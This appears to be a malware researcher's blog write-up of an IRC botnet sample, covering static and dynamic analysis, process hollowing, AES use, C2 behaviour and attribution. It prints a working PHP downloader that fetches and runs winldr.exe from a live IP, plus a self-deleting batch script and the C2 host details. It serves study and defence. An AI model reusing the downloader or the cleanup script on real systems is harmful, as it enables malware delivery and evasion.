That pretty much covers the disassembly, at least as far as I want to take it since I need to move on to other things. Debugging was largely unsuccessful, I suspect there are some anti-debugging things going on but I’m not looking into this right now.

I did try to connect to the malware C2 site (37.59.118.41) over anonymous FTP and was able to log in. I found an empty pub folder and three .ico files in the directory. I opened one of the .ico files in notepad++ and found this:

<?php
error_reporting(0);
$ln = "http://37.59.118.41/";
$nm = "winldr.exe";
$bt = implode("", array('f','.','b','a','t'));
$fl = $ln . $nm;
$bc = "START " . $nm;

function fileDL ($uf, $pf)
{
$nfn = $pf;
$fn = fopen ($uf, "rb");
if (!$fn) exit;
$nuf = fopen ($nfn, "wb");
if (!$nuf) exit;
while(!feof($fn))
fwrite($nuf, fread($fn, 1024 * 8 ), 1024 * 8 );
fclose($fn);
fclose($nuf);
}

fileDL($fl,$nm);
$bf = fopen($bt,"w");
if(!$bf) exit;
fwrite($bf,$bc);
fclose($bf);
exec($bt);
?>

Well, that’s interesting. Basically what this does is:

– downloads the winldr.exe file from the server in 8 KB chunks
– creates a batch file called f.bat that contains START winldr.exe
– executes f.bat, which launches winldr.exe as a separate process

Thanks to the Captain for taking a look at the PHP.

This is what I get when I visit the malware IP with a browser:

bear2-49

No, the live chat button didn’t work. Would have been interesting.

An address of http://37.59.118.41/winldr.exe, however, does result in a 24 KB file being downloaded.

I tried running the original payload in a debugger to see if I could catch the password being sent, didn’t have any luck. However, I noticed this:

bear2-50

A new C2 domain and port? I tried connecting there via IRC but was unsuccessful.

I need to move on from this sample, but I did do a little observation of winldr.exe and here are the most interesting things that I observed. This sample seems to scan IP addresses, as within a couple of minutes I saw it connect and disconnect from about 9,600 IP addresses (list attached to this post, see below). I also noticed that this piece created 94 threads in a row at one point. Winldr.exe does connect to the C2 server, but to a different channel (#j) and with a different nick format (this instance connected as jlqydetno). One of the online sandboxes had this sample connect to l.kokoke.net on port 8089 (mine didn’t). This file didn’t appear to be packed. A funny thing that I noticed is that one of the functions contains the string “KeepITSimple”:

bear2-51
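The list of scanned addresses mentioned above is easier to reason about when grouped by network. Here is a minimal sketch of that kind of summary, assuming the attached list has one IP address per line (the format of the attachment is not shown here, so that is a guess) and using a /16 grouping that is just an illustrative choice:

```python
import ipaddress
from collections import Counter


def summarize_scanned(lines, prefix_len=16):
    """Count scanned addresses per enclosing network of the given prefix length."""
    counts = Counter()
    for line in lines:
        text = line.strip()
        if not text:
            continue
        try:
            addr = ipaddress.ip_address(text)
        except ValueError:
            continue  # skip anything that is not a bare IP address
        # strict=False lets us derive the enclosing network from a host address
        net = ipaddress.ip_network(f"{addr}/{prefix_len}", strict=False)
        counts[str(net)] += 1
    return counts


# Hypothetical input lines, not taken from the real list
sample = ["10.1.2.3", "10.1.9.9", "192.168.0.5", "not-an-ip", ""]
for net, n in summarize_scanned(sample).most_common():
    print(net, n)
```

A heavily skewed distribution would suggest the scanner walks particular ranges rather than picking targets at random.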

This file also blows up on VirusTotal (42/53 or so). Its size is 24,576 bytes and its hashes are:

winldr.exe hashes:
MD5:6e7b29c6148c94036f7ef7c1f3fa90b9
SHA1:80a80c14d4ab5ae2e08436e4e0536b5a80bfe8ab
SHA256:8b1b55939eb90e878fea2b4013c73ba0421f5d61ab3f52249f44eeaf53f69205
ssdeep:384:tFETgfzaRXAojQiZuRBXnXAWe9drTLUonW41ldc2H0:tYgrmQiwR6WGVnWi7t0
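For anyone who wants to check a downloaded copy against the values above, here is a small sketch using Python's hashlib. It covers MD5, SHA1 and SHA256 only; ssdeep needs a third-party library and is left out. The file name in the usage comment is hypothetical.

```python
import hashlib

# Published winldr.exe hashes, copied from the list above
WINLDR_HASHES = {
    "md5": "6e7b29c6148c94036f7ef7c1f3fa90b9",
    "sha1": "80a80c14d4ab5ae2e08436e4e0536b5a80bfe8ab",
    "sha256": "8b1b55939eb90e878fea2b4013c73ba0421f5d61ab3f52249f44eeaf53f69205",
}


def file_hashes(path, chunk_size=8192):
    """Return the MD5, SHA1 and SHA256 hex digests of a file, read in chunks."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}


def matches_published(path, published):
    """True if every published digest matches the file (case-insensitive)."""
    actual = file_hashes(path)
    return all(actual[name] == value.lower() for name, value in published.items())


# Usage (hypothetical local path):
# print(matches_published("winldr.exe.sample", WINLDR_HASHES))
```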

Anyway, some things I could follow up on in the future include:
– Figure out exactly what causes the debugger to fail
– Determine the nick generation system in use, and try to impersonate a bot account on the C2 server
– Try to log traffic over a long period of time to try to observe actual C2 traffic being sent
– More research on uNkn0wn Crew

References:
https://en.wikipedia.org/wiki/MD5
https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
https://github.com/japanesemediamanager/jmmserver/blob/master/hasher/MD5_asm.asm

Findings and observations:
Robust bot software that offers lots of features to the author or other controller. We saw that there was a detailed system inventory function; ability to (at a minimum) inventory local networks; update the C2 server; update the software; provide troubleshooting info to the author(s) in the event of errors; anti-analysis techniques; remote shell access; remote execution; various methods of hiding the malware and its traffic/activities; presumed encoding features to provide information back to C2 in the form of account names, etc.; and features that allow the bot controller to recon remote systems and also attack those systems. We also found several techniques in this sample and the previous one (the launcher) used to obfuscate the bot code, such as encryption (AES), hashing (MD5) and encoding (base64, XOR).

Recommendations:
Same recommendations as noted in the analysis of the launcher. One might also consider blocking TFTP (UDP port 69) unless it is actively in use, as this was shown to be one way this malware downloads updates.

Conclusion:
Really cool and fascinating bot to work on, with lots of features and functionality for the authors. Not only does it provide offensive features such as remote shell access and the ability to scan and exploit other machines, it also has housekeeping functions such as error tracking and reporting and an update feature. This was a great sample to work on.

Report:MalEXE001payload-pdf
Scanned IP Address List:IPsScannedByWinldr-exe

Hashes (payload):
MD5:d4851b410d158cf650d3f772e270f305
SHA1:4ee5121b05820e8f04b6560f422180660df29b2d
SHA256:267674ddf67827afa282763e57313fc636f170fbffaf104e69ee4db49d1567d5
ssdeep:1536:daWAQE3GZ8CAu9ax2MaO7tJoQuQQTKZc9q3RXFuEUk:JAQE2UHaO2QQTv4XF9Uk

BEAR

I turn my attention to the sample that came into the new honeypot, mentioned in the prior post. I uploaded the sample and it pretty much blew up VirusTotal:

BEAR1

Nice. Also, I happened to notice that the file has a PE header, which is a welcome change from all the spammy documents I’ve been looking at so far. I didn’t delve too deep into what else the site found because I want to try to see how much I can find on my own – the point isn’t to just upload stuff and have a sandbox do the work for me, I want to see what I can get out of it myself and then “check my work”, so to speak, in the sandbox.

Static Analysis


BEAR2

I started with some basic static analysis stuff like strings.exe. What I get is some pretty standard looking stuff – in the beginning (not shown) you see the header and see mention of the .text, .data and .rdata sections. Further down you see what we’re meant to believe are imported functions. GetTickCount could be used as an anti-debugging technique, but it could also have a more conventional use. GetVersion could be used to survey the host in order to see what is running and possibly also to inventory the system. VirtualAlloc can be interesting when associated with other imports that might have to do with process injection, but I’m not seeing those other imports here. WriteFile is always a good one, since this means that something is probably being written (either a file is dropping for some purpose on the host, or perhaps data is written to a file before exfiltration).

After this list of function names, there were pages and pages of random strings. Nothing in there resembled anything like a host name, IP address, messages, file names, mutex names, nothing at all. I’m guessing this file isn’t packed due to the plaintext import names and regular section names, but not sure yet and need to look deeper. My guess right now is that whatever strings, arguments, etc. the sample uses are obfuscated somehow.

Opening this sample in PEview reveals some more info. This particular sample is relatively new, compiled on June 4th of this year. Quickly checking a few anti-debugging things, I see there is no TLS table and the number of data directories looks fine (0x10). The virtual and raw sizes of each section are very close in size to one another, again suggesting that the file isn’t packed and reinforcing the assumption that there’s obfuscation of some sort going on here.
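The virtual-versus-raw size comparison can be written down as a simple check. This is only a rough sketch: the section tuples are hypothetical values you would copy out of a tool like PEview, and the 4x ratio is an arbitrary threshold I picked for illustration, not an established cutoff.

```python
def suspicious_sections(sections, ratio=4.0):
    """Flag sections whose virtual size dwarfs their raw (on-disk) size.

    sections: iterable of (name, virtual_size, raw_size) tuples.
    A section with no raw data but a nonzero virtual size, or one that
    grows a lot in memory, is a common (not conclusive) packing hint.
    """
    flagged = []
    for name, virtual_size, raw_size in sections:
        if raw_size == 0 and virtual_size > 0:
            flagged.append(name)
        elif raw_size > 0 and virtual_size / raw_size >= ratio:
            flagged.append(name)
    return flagged


# Hypothetical numbers: sizes close to each other, so nothing is flagged
print(suspicious_sections([(".text", 0x5000, 0x5000), (".data", 0x1000, 0xE00)]))
```

An empty result fits the "not packed, but obfuscated" reading above; it does not prove it, since data can be encrypted in place without changing section sizes.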

The next tool up is Krypto Analyzer (KANAL) for PEiD. KANAL is a tool that looks through files for indications that there might be some sort of encryption going on. These indications include constants associated with various encryption schemes, function imports related to cryptography, and the like. The main issue with using KANAL is that if the sample uses something non-standard (such as a custom base64 index), KANAL will not pick that up. There are also cryptography schemes that do not use “magic constants”, and those won’t be picked up by KANAL either. In this case, KANAL did find something:

BEAR3

Rijndael is the cipher that was selected as the Advanced Encryption Standard (AES), which superseded DES. The block size for AES is 128 bits, while key lengths can be 128, 192 and 256 bits. It’s a symmetric-key system, so the same key is used for encryption and decryption. The output from KANAL refers to S-boxes (the [S] and [S-inv] in the screen capture above). Substitution boxes (S-boxes) are 256-byte lookup tables used in AES. The first reference above (RIJNDAEL [S]) refers to the encryption side, while the second (RIJNDAEL [S-inv]) refers to the inverse S-box that would be used for decryption. This could mean that this sample both encrypts outgoing traffic and receives encrypted incoming traffic from C2. Another nice thing about the KANAL output is that it also shows where the references to these constants are, which will help later with disassembly/debugging.
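To illustrate the kind of constant matching described above, here is a minimal sketch that looks for the first 16 bytes of the AES S-box and inverse S-box in a blob of bytes. This is not how KANAL is implemented (I don't know its internals); it only shows the general idea, and it will miss implementations that store the tables in another layout or generate them at runtime.

```python
# First row of the AES S-box and inverse S-box (from the AES specification)
AES_SBOX_HEAD = bytes.fromhex("637c777bf26b6fc53001672bfed7ab76")
AES_INV_SBOX_HEAD = bytes.fromhex("52096ad53036a538bf40a39e81f3d7fb")


def find_aes_tables(data: bytes):
    """Return file offsets where the S-box or inverse S-box appears to start."""
    hits = {}
    for label, needle in (("S", AES_SBOX_HEAD), ("S-inv", AES_INV_SBOX_HEAD)):
        offsets = []
        start = data.find(needle)
        while start != -1:
            offsets.append(start)
            start = data.find(needle, start + 1)
        hits[label] = offsets
    return hits


# Usage (hypothetical path):
# with open("sample.bin", "rb") as fh:
#     print(find_aes_tables(fh.read()))
```

Note that the offsets returned are file offsets, so they need converting to virtual addresses before they line up with what a disassembler shows.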

Dynamic Analysis

After this I jumped into disassembly and debugging to try to get a general feel for this sample, and then took a step back and went through a more structured dynamic analysis with the usual tools (procmon, procexp, wireshark, and so on). When I first ran this sample, I observed the original instance of the sample (PID 3688) spawns a child process of itself (PID 760) shortly after execution, and then shortly after that the original instance (3688) terminates.

The first instance imports kernel32.dll and user32.dll, but the second instance imports these and several others including ws2_32.dll and advapi32.dll. The first time I ran this sample, I did it without an Internet connection and did not notice any files dropping. The second time, however, I first obtained an Internet connection, and this time I observed a call to WriteFile. This was actually a pretty obvious file drop: in the directory where the executable is located, a file called wcsqmpbh.bat appeared in the open, containing the following instructions:

@echo off
:deleteagain
del /A:H /F [samplename].exe
del /F [samplename].exe
if exist [samplename].exe goto deleteagain
del wcsqmpbh.bat

Note that [samplename] refers to whatever file name you’ve given the sample. Strangely, this batch file was executed according to procmon, though the original executable and the batch file remain. Perhaps this is a file that the bot controller could remotely execute should the need arise to cover their tracks, but it’s unclear why these files didn’t actually get deleted following execution. The flags indicate that the batch file was trying to force deletion of both hidden and unhidden copies of the malware, regardless of whether the file was read-only at the time.

The obfuscation at work in this sample made disassembly and debugging difficult. However, I was able to look at the strings in the images of the running samples in Process Explorer and saw many interesting ones. I’ll look at some of these in more detail.

One of the first things that stood out to me was a series of what appear to be IRC commands and a channel name (#balengor). These commands match what I observed in the packets captured in Wireshark and line up with how one would connect to and register on an IRC server, followed by strings that are used to build the commands to join the probable C2 channel, set the appropriate modes for the connected user, and so forth. You also see a reference to Eggdrop, an IRC bot and a version number for this software.

UNK
NICK %s
USER %s %s %s :%s
PASS %s
NOTICE %s :
PRIVMSG %s :
message
NOTICE %s :
PRIVMSG %s :
NOTICE
link!link@link PRIVMSG %s :%s
NICK
USERHOST %s
JOIN %s %s
MODE %s +xi
MODE %s +smntu
JOIN
ERROR
VERSION %s
eggdrop v1.6.16
VERSION link v%d.%03d%s (Win32)
PING
PING
VERSION
VERSION
SEND
DCC
PRIVMSG
MODE
PONG
PONG %s
PING
link!link@link
ndEvery1
#balengor
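When matching strings like these against captured traffic, it helps to split each raw IRC line into its prefix, command and parameters. Below is a minimal sketch of such a parser, following the general IRC message layout (optional ":prefix", a command, then parameters, with a final " :" introducing a trailing parameter). It is a triage helper, not a full protocol implementation, and the example lines are made up from the strings above rather than taken from the capture.

```python
def parse_irc_line(line: str):
    """Split a raw IRC line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        # ":nick!user@host COMMAND ..." -> peel off the sender prefix
        prefix, _, line = line[1:].partition(" ")
    # Everything after the first " :" is a single trailing parameter
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command = parts[0].upper() if parts else ""
    params = parts[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


# Illustrative lines built from the format strings above
print(parse_irc_line("PING :e.TK"))
print(parse_irc_line(":link!link@link PRIVMSG #balengor :hello there"))
```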

Here are a few examples of where you see some of these strings in the traffic:

bear4

Another string that stands out is a standard base64 index:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
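Since a sample can just as easily carry a shuffled index, a quick way to deal with either case is to translate the data back to the standard alphabet before decoding. This is a sketch under the assumption that only the 64-character index differs and that "=" padding is unchanged; the swapped-case index in the example is invented for illustration.

```python
import base64
import string

STANDARD_INDEX = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def is_standard_index(index: str) -> bool:
    """True if a recovered 64-character index is the standard base64 alphabet."""
    return index == STANDARD_INDEX


def decode_with_index(data: str, index: str) -> bytes:
    """Decode base64-like text that was encoded with a custom 64-character index."""
    if len(index) != 64 or len(set(index)) != 64:
        raise ValueError("index must contain 64 distinct characters")
    # Map each custom character back to its standard counterpart, then decode
    table = str.maketrans(index, STANDARD_INDEX)
    return base64.b64decode(data.translate(table))


found = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
print(is_standard_index(found))
```

For the index found in this sample the translation step is a no-op, so ordinary base64 tools should work on anything encoded with it.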

There’s an extensive section of strings that mention bots and relate to the various activities that the bot can carry out. There are strings related to scanning for remote machines, exploitation of those machines, exploitation statistics, remote shell access, file transfer, references to protocols (tftp, ftp, http), parts of a dynamically created user agent, and status messages related to restarting the malware or terminating it.

Scanned
:%s in
sec.
open IP(s) found
:%s is open
– Scanning
:%s for
second(s)
Scanning
:%s for
second(s)
Scanning
:%s for
second(s), t:%u s:%u
– Attempted
exploitation(s) on
IP(s).
Attempting to exploit
with
– Attempting to exploit IP’s in list.
Attempting to exploit IP’s in list.
Exploit statistics –
Listing exploit statistics
bot(s) found with string
No bots found with string
found string
in %s (
– Listing bots with string
%s bots with string
Killing
Listing
Cmd.exe process has terminated.
Could not read data from process.
cmd.exe
Error while executing command.
Remote cmd thread
open
Received
from
sec with
KB/sec
– Receiving
from
Receiving
from
Content-Length: %u
Content-Length:
GET /%s HTTP/1.0
Host: %s
– Unsupported protocol specified.
– Error while downloading
– Unable to start
– Successfully downloaded
with
KB/sec%s.
, executing
, updating
– No file to download specified.
tftp://
anonymous
ftp://
http://
– Cannot read source file
– Cannot write to destination file
file://
– Downloading
Downloading
.exe
QUIT :restarting
QUIT :exitting [sic]

Near these commands are strings that relate to debugging issues with the malware, including one string that is constructed during crashes that contains information about the CPU state at the time of the crash (in this case you see that it saves the state of the registers), along with some error messages.

debug
– Module “%s” reported a crash in “%s”: N=%u EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLAGS=%08X. Code: %08X (%s). %s…
Continuing
Restarting
EXCEPTION_FLT
EXCEPTION_INT_DIVIDE_BY_ZERO
EXCEPTION_STACK_OVERFLOW
EXCEPTION_NONCONTINUABLE_EXCEPTION
EXCEPTION_BREAKPOINT
EXCEPTION_ACCESS_VIOLATION
EXCEPTION_ILLEGAL_INSTRUCTION
EXCEPTION_OTHER

Many strings relate to system information, probably so that the controllers can inventory the systems in the botnet. The string USA is found in the beginning – perhaps this was generated dynamically since this sample was run on a machine located there. Other strings relate to CPU and memory information, uptime, networking information, firewall status, and storage information. One string seems to mention encryption along with the number 128 – perhaps this is a clue that the key is 128-bit, but I would like to find something in the disassembly that would back this up. Interestingly, you can also see that the bot seems to rate some of these aspects as Good, Avarage [sic] and Bad.

USA
System information – OS: Windows
). CPU: %s
MHz. Ram:
MB free. IPv6:
. Uptime:
day%s
hour%s
minute%s. Computername:
. User:
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Yes
no SP
Sysinfo thread
Network information – Host:
. Name:
. Type:
. IPv6:
. Firewalled:
. Latency:
, %u. IRC Uptime:
day%s
hour%s
minute%s.
Good
Avarage [sic]
Bad
LAN
Modem
Unknown
Netinfo thread
%sTotal drives:
, Total space:
MB free.
MB free
unknown
ramdisk
cd-rom
remote
fixed
removable
Drive information –
Driveinfo thread
thread
btg
debug
– btg tried executing an unreadable address. (%08X)
– No threads running.
– Listing
threads:
QUIT :changing server
link v
%s [Win32]
Uptime – System:
day%s
hour%s
minute%s. IRC:
day%s
hour%s
minute%s
Debug mode is %s.
off
Exe download server:
none
Exe download server:
f128enc+fab decrypted:
f128enc+fab encrypted: =

The network activity was pretty interesting to observe. As noted above, the malware connects via IRC to her.d0kbilo.com (37.59.118.41) on port 4466. There was actually quite a bit of plaintext in the traffic:

BEAR5

The nicks assigned to my various instances all seemed to follow the same format: a “d”, then seven letters, then a “b”, or d[a-zA-Z]{7}b as a rough regular expression. I was able to confirm this by connecting to the server and trying to interact with the bot account from a remote location. If you try to connect to the IRC server from the same IP, you get the following result:

BEAR6
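The nick format described above (a "d", seven letters, then a "b") is easy to turn into a check for log or pcap triage. This is a sketch based only on the handful of nicks I observed, so treat the pattern as a working guess rather than the actual generation scheme; the nick "dabcdefgb" is a made-up example.

```python
import re

# Working guess at the nick format seen for this sample: d + 7 letters + b
BEAR_NICK = re.compile(r"d[A-Za-z]{7}b")


def looks_like_bot_nick(nick: str) -> bool:
    """True if the whole nick matches the observed d.......b pattern."""
    return BEAR_NICK.fullmatch(nick) is not None


for nick in ("dabcdefgb", "gurdaptl"):
    print(nick, looks_like_bot_nick(nick))
```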

Upon connecting to the server (independently, not as a malware instance), an operator account sets your user mode to +iwG (i makes the nick invisible, w enables receipt of wallops messages, and G filters out certain words). Joining the malware C2 channel shows that the channel mode is set to +smntu: secret (s), moderated (m), no external messages (n), and only operators may change the topic (t). I couldn’t determine what +u does on this server, though on stock UnrealIRCd it is the “auditorium” mode, which hides the user list from non-operators. Malware nicks receive user mode +xi, which cloaks the host (x) and makes the nick invisible (i), hiding it from /WHO and /NAMES commands executed from outside the channel.

Trying to obtain a list of channels from my regular IRC client was unsuccessful (which was unsurprising, since the channels are set to be secret) but strangely an online IRC client did show some channels:

BEAR7

If you know a specific nick, you can still contact that person even if they are set to invisible. You can see in the following packets when I was sending traffic to the malware’s IRC instance, which was also a way that I was able to confirm that the nicks are plaintext and not obfuscated (though, the nicks themselves likely follow some sort of coding standard to help identify the victims):

I sent a /QUERY to the malware nick (my nick was gurdaptl and I was connecting from Kiwi IRC):

BEAR8

I created a channel called #flot and invited the malware nick there (no luck):

BEAR9

Apart from this, the only other activity I observed was that the malware would have a PING/PONG exchange with a user “e.TK” about every 90 seconds or so. I recorded about 40 minutes of such traffic but did not observe anything else.

Getting back to some of the other malware behavior, one thing noticeably absent was any indication of persistence – while running as a regular user (i.e., not with administrator privileges). I tried various tools (Autoruns, RegShot, GMER, etc.) to check for changes to the system and for some sort of persistence mechanism, but found nothing. Following a reboot, the malware did not appear to be running. Since I wondered if there was something preventing me from seeing the sample (some sort of hooking, etc.) I captured packets for about five minutes but observed no traffic to the malicious server or really anything out of the ordinary. I can’t imagine that you’d have a useful botnet that didn’t achieve persistence, but perhaps this is again a quirk of either my VM environment (user permissions, etc.) or merely the fact that I am running in a VM.

I re-ran the sample as administrator, and got some very different results this time in terms of how it attempts to both hide itself and achieve persistence. As a side note, I’m going to take an analytical leap of faith and say that this sample doesn’t escalate privileges due to the much different behavior observed when run as an administrator vs. a regular user.

First, the file does succeed in deleting itself after execution, along with the batch file. What was really interesting was that the malware then proceeds to create and replace a number of new processes every 60 seconds or so. The number of processes varied between runs, but ranged from as few as 4 to as many as 16. This long series looked like this (process name and PID):

1. [sample].exe, 3052
2. [sample].exe, 2848
3. winamp.exe, 212
4. winamp.exe, 2616
5. algs.exe, 864
6. algs.exe, 1004
7. logon.exe, 2220
8. logon.exe, 872
9. winlogon.exe, 2980
10. winlogon.exe, 420
11. spoolsvc.exe, 2572
12. spoolsvc.exe, 2536
13. spoolsv.exe, 2556
14. spoolsv.exe, 2476
15. lssas.exe, 2168
16. lssas.exe, 2264

I noticed that the malware always seemed to follow this pattern of creating two processes of the same name during this procedure. The final process in the list is then added to the registry to be run at startup, for example:

BEAR10

No matter the final process that is set to run at startup, it always gets stored in this same place in the registry, at least in my test environment.

Upon restart, I observed the final two steps in the procedure above repeat (i.e., 15 and 16). That was all – there wasn’t another series of processes created as in the original run. Looking at the image confirmed that this was definitely the malware and not a legitimate process after reboot:

BEAR11

Network Activity

The only anomalous activity detected in Wireshark was traffic to and from 37.59.118.41 (her.d0kbilo.com) on port 4466. Examination of the packets revealed some plain text which appeared to be IRC-related. In the strings recovered from the sample we see some of the same commands (e.g., USERHOST) as in the packets. The values passed to these commands, however, appear to be encrypted.

BEAR12
When I visited the C2 IRC server, it proclaimed that this was a modified version of the UnrealIRCd IRC server. What’s curious to me is that even though this software was modded by the malware author(s), the IRC commands seem to need to be passed in plain text.

Sitting in the C2 channel didn’t reveal anything. The mode set for you as an unregistered user prevents you from saying anything in the channel and the usernames for you and the other accounts in there are set to invisible. I found a document online apparently written by someone from uNkn0wn Crew and it refers to a couple of other channels, but nothing was going on in those either (though I did have voice enabled there, so I could talk in the channel but no one seemed to be listening or responding).

Disassembly/Debugging

One thing I noticed pretty early on is that this sample does at least two things that make disassembly and debugging more difficult. One is that many function calls are indirect, so you sort of have to switch back and forth between the disassembler and the debugger to see what is really being called when you see something like call dword ptr [eax+0Ch]. Here’s a screenshot showing some of this along with where I’ve inserted some comments so I can better keep track of what’s actually called:

BEAR13

The other thing is that this sample creates and replaces multiple new processes, which makes debugging a real pain. I’m going to call out a few specific areas where I found something that looked interesting in this sample.

Starting at the function at 40204F, there’s a series of calls to GetModuleHandleA and GetProcAddress to get handles and addresses of various functions that will be used later for the process replacement:

BEAR14

Looking at it in both IDA Pro and Olly, this series of functions gets handles and addresses of:

tableoffunctions

The sub at 40224C finds the code to be written in the process replacement:

BEAR15

Then there’s a block to create the suspended process for future replacement:

BEAR16

Looking at this, I didn’t see a call to CreateProcessA, but I saw one of the parameters pushed on to the stack was 0x4. When you want to create a process in a suspended state, you pass 0x4 as the CreationFlags parameter. To confirm this, I checked it out in a debugger and we can see this at work for the first process that the malware spawns (in this case, it creates a suspended process of itself) and you can see that CreationFlags is set to CREATE_SUSPENDED in the stack in the bottom right:

BEAR17
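When all you have is a raw value pushed on the stack, a small lookup makes it quicker to see which process creation flags are set. The sketch below covers a handful of common CreateProcess flag values from the Windows SDK headers; it is deliberately not a complete list, and anything it doesn't know is reported as unknown.

```python
# A subset of CreateProcess dwCreationFlags values (not exhaustive)
CREATION_FLAGS = {
    0x00000001: "DEBUG_PROCESS",
    0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x08000000: "CREATE_NO_WINDOW",
}


def decode_creation_flags(value: int):
    """Return the names of the known flag bits set in value."""
    names = [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]
    known = sum(bit for bit in CREATION_FLAGS if value & bit)
    leftover = value & ~known
    if leftover:
        # Bits outside the table above are reported rather than guessed at
        names.append(f"UNKNOWN(0x{leftover:X})")
    return names


print(decode_creation_flags(0x4))
```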

Further along, we see a block of code at 402394 that loops and writes the malware to memory, and then once fully written, the block beginning at 4023D7 resumes the thread to complete the replacement:

BEAR18

After that overall function returns, the malware calls an exit function at 403608:

BEAR19

This sample appears to use AES. As previously stated, KANAL found the constants, which you can see here in this shot from IDA Pro:

BEAR20

I have a very high level understanding of AES, so I sort of know what to look for, but I couldn’t get through too much of the code that appears to deal with this encryption. First, here are a few things about AES:

– Block sizes are always 128 bits
– Key sizes are always 128, 192, or 256 bits
– Using AES comprises the following steps. Note that the number of rounds depends on the size of the key – 10 rounds for a 128-bit key, 12 rounds for a 192-bit key, and 14 rounds for a 256-bit key.

  1. Key Expansion (round keys derived from cipher key)
  2. Initial Round
    1. Add Round Key (each state byte combined with a block of the round key)
  3. Rounds
    1. Sub Bytes (where the S-box comes into play)
    2. Shift Rows (transposition)
    3. Mix Columns (combining of 4 bytes in each column)
    4. Add Round Key (see above)
  4. Final Round
    1. Sub Bytes (S-box, again)
    2. Shift Rows (see above)
    3. Add Round Key (see above)

For more detail, please see the link in the references.
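The relationship between key size and round count in the steps above is simple enough to write down: the number of rounds is the key length in 32-bit words plus 6. Here is a small sketch of that, plus the reverse lookup that is handy when you find a round counter in a disassembly and want to guess the key size. The function names are mine, not anything from the sample.

```python
def aes_rounds(key_bits: int) -> int:
    """Number of AES rounds for a key size: key length in 32-bit words plus 6."""
    if key_bits not in (128, 192, 256):
        raise ValueError("AES keys are 128, 192 or 256 bits")
    return key_bits // 32 + 6


def key_bits_for_rounds(rounds: int) -> int:
    """Reverse lookup: which key size uses this many rounds?"""
    mapping = {aes_rounds(bits): bits for bits in (128, 192, 256)}
    return mapping[rounds]


def round_schedule(key_bits: int):
    """List the steps per stage: initial round, full rounds, final round."""
    full = ["SubBytes", "ShiftRows", "MixColumns", "AddRoundKey"]
    final = ["SubBytes", "ShiftRows", "AddRoundKey"]  # no MixColumns at the end
    n = aes_rounds(key_bits)
    return [["AddRoundKey"]] + [full] * (n - 1) + [final]


for bits in (128, 192, 256):
    print(bits, aes_rounds(bits))
```

Keep in mind that a loop counter in a binary may count the full rounds only, or count down from the total, so an observed constant is a hint about key size rather than proof.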

There is a loop beginning at 40121D that could be the Mix Columns loop as it iterates in 4-byte blocks:

BEAR21

Sub 401079 is where we first see the S-box being used:

BEAR22

One interesting thing can be seen later, in a sub at 4016A5. Here we see a function that works with the S-Inv box (MaybeSINVSubBytes) and there’s a local variable that is set to 0xE (14) that is used to loop. One thing we know from earlier is that the number of rounds for a 256-bit key should be 14, so perhaps this is a clue that we’re looking at 256-bit AES:

BEAR23

This represents some things I thought were interesting about this initial run of the malware. In this first run, what appears to happen is that the malware starts and finds several functions that are necessary to do process replacement. Following this, the sample decrypts data beginning at 4061C4 and then replaces the suspended process with this. Here is this section before decryption:

BEAR24

Here is a view of this area in Olly after decryption (you can see the MZ (4D5A) “magic number”):

BEAR25
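Spotting the MZ bytes by eye works, but when carving from a larger memory dump it helps to confirm that an "MZ" is really the start of a PE file. A minimal sketch: read the 4-byte e_lfanew field at offset 0x3C of the candidate header and check that it points at a "PE\0\0" signature. This only validates the two signatures, not the rest of the headers, and the dump file name in the usage comment is hypothetical.

```python
import struct


def find_embedded_pe(data: bytes):
    """Return offsets of 'MZ' headers whose e_lfanew points at a PE signature."""
    offsets = []
    pos = data.find(b"MZ")
    while pos != -1:
        # The DOS header is 0x40 bytes; e_lfanew lives in its last 4 bytes
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            sig = pos + e_lfanew
            if data[sig:sig + 4] == b"PE\x00\x00":
                offsets.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return offsets


# Usage (hypothetical dump file):
# with open("decrypted_region.bin", "rb") as fh:
#     print([hex(o) for o in find_embedded_pe(fh.read())])
```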

I took all of this and dumped it from Olly into its own file, and then took a look in PEview:

BEAR26

Nice.

I’m not going to dive into this payload right now (that will be a future analysis). However, we can already see imports (DLLs like WS2_32, shell32, ADVAPI32) and plaintext strings:

BEAR27

I would have liked to have fully taken the crypto functions apart and recovered the key and the AES parameters in use, but I think that it’s good enough (at least for now) to have recovered the encrypted payload for further analysis.

Attribution

There were some interesting things found pertaining to attribution with this sample. The malware connects to her.d0kbilo.com, which sits behind a domain privacy provider, so nothing much to see in the whois lookup. There were multiple indications of IRC traffic (the Wireshark activity, the #Balengor string in the sample, etc.) so I decided to try to connect to her.d0kbilo.com. The regular IRC port failed but connecting on port 4466 (like the sample) succeeded. Interestingly, I was able to connect as a regular, unregistered user although my activities on the server were constrained. One of the initial messages greeting me on the server was that the box belonged to “uNKn0wn Crew” who apparently could be found at www.uNkn0wn.eu. It also mentioned an email address – iD@uNkn0wn.eu.

BEAR28

One of the few commands that I was allowed to execute on this server showed me the local time on the server, which placed it in the UTC+2 time zone. It’s certainly possible that this server had an arbitrary time zone set, but if the time zone is actually indicative of geography, the server could be in many places: much of continental Europe during summer time (CEST), parts of central, eastern and southern Africa, or parts of Southwest Asia. IP address location services place the server in France or Spain, both of which are on UTC+2 in the summer.

BEAR29

